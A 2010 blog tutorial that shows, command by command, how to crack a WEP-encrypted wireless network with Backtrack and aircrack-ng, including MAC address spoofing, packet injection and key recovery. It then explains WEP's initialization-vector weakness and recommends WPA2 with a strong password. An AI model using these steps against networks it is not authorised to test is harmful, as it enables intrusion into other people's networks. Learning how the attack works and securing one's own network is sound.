Saturday, June 5, 2010

Cracking WEP Encrypted Wireless Network and Solution to Stronger Security

This tutorial will explain the steps in cracking into a WEP (Wired Equivalent Privacy) encrypted wireless network, the reason for the vulnerabilities in WEP, and proper steps in protecting yourself from having your wireless network penetrated.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Aircrack suite that is included with the Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.

2. A wireless adapter that allows passive packet sniffing and packet injection. I am using Alfa AWUS036H Wireless Adapter. The USB connection, good antenna, and ease of use makes the adapter a good choice.

3. Wireless router. I am using Cisco-Linksys WRT54GL wireless router.


1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.

2. Open up a Konsole window. It is the 3rd icon from the right on the lower left hand corner.
  • In the steps, I post what I actually typed as you can see on the screen shots.  Below the steps is the syntax for the command line. Replace the word in the parenthesis for your actual data. Click on the screen shots for an expanded view.

3. Type airmon-ng at the command prompt and press enter to list the adapters associated with your computer. I only have the Alfa adapter which is the wlan0 interface.

4. Type airmon-ng stop wlan0 and press enter. This step is wlan0 out of monitoring mode.
airmon-ng stop (interface)

5. Type ifconfig wlan0 down and press enter. The step enables us to change our MAC address in the next step so we can access the wireless router even if it has a MAC address filter to prevent outsiders from entering.
ifconfig (interface) down

6. Type macchanger --mac 00:11:22:33:44:55 wlan0 and press enter. The MAC address is a physically embedded address for the NIC card. Every computer has a different MAC address. In order to penetrate into a wireless network with MAC filtering enabled, we would have to find out a legit MAC address that we can copy. For this tutorial, I am hacking into my own network without MAC filtering. I will be using a bogus MAC address for demonstration purposes.
macchanger --mac 00:11:22:33:44:55 (interface)

7. Type airmon-ng start wlan0 and press enter. This will put the wireless adapter in monitor mode.
airmon-ng start (interface)

8. Type airodump-ng wlan0 and press enter to display a list of wireless networks to penetrate. In the figure below, my network is listed second. Once you spot the network, hit ctrl+c together to stop the process.
airodump-ng (interface)

9. Type airodump-ng -c 6 -w Li --bssid 68:7F:74:27:99:B5 wlan0 and press enter. The -c 6 indicates channel 6; -w Li indicates that I will be saving a file named Li that will contain collected data packets. The bssid is the MAC address of the wireless router and wlan0 is the interface.
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

10. The figure below automatically pops up. Now, you are capturing data packets and saving the data packets to the specified file named earlier. You will need around 20,000 data packets to crack the WEP key. I've read the number of packets go as high as 80,000. The number in the "#Data" column is the amount of packets captured.

11. Open a new Konsole window and type aireplay-ng -1 0 -a 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 -e LilRalph wlan0 and press enter.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

12. Type aireplay-ng -3 -b 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 wlan0 and press enter. We are creating more router traffic to speed up the process of cracking the WEP key.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

13. Once you have captured enough packets, open up a new Konsole window and type aircrack-ng -b 68:7F:74:27:99:B5 Li-01.cap and press enter.  "Li-01.cap" is the file I created in step 9. I posted my screen shot of the file saved to the desktop. You can try every 5,000 packets. If it is not enough to crack the WEP key, the screen will display that it did not succeed and wait for more data packet capture. If it did succeed cracking the WEP key, it will display the figure below with key in hexadecimal format. You can type this hexadecimal number into the text box for the key without the colons and you successfully hacked into the wireless network.
aircrack-ng -b (bssid) (file name-01.cap)

 *The file, Li-01.cap, is where I will be saving the data captures

*Waiting for result.....

*....still waiting

*Failed. Hit ctrl+z to stop and the next time you try again, hit the up arrow key and press enter.

*Yay. Passed. Now, enter that security key without the colons to enter the network.


WEP uses a RC4 stream cipher encryption algorithm. The 128 bit WEP key uses 104 bits for the key plus 24 bits for the initialization vector (IV). The security issue and ease of cracking WEP is linked to the length of the IV and being sent in clear text with the encrypted data packets using RC4 algorithm. The clear text IV will eventually repeat itself with different encrypted data packets. WEP's IV size of 24 bits provides for 16,777,216 (each bit is a 1 or a 0, thus 2 to the 24th power) different RC4 cipher streams for a given WEP key, for any key size. Depending on the amount of traffic (number of users on the network), the key can be cracked in a short amount of time.


Use WPA2 Personal with TKIP+AES or PSK encryption. The only realistic way for this security to be hacked is by having a weak password that can cracked by password cracking tools. Another way which is feasible but unrealistic is by brute force. Brute force means trying every password combination with all possible characters. The crack is feasible with time but unrealistic by length of time it will take to crack a strong password. Therefore, use a strong password (guidelines and examples) for the key to the network. I recommend using this password generator site to generate a 63 character password and storing the password in Keepass (blog post about the product).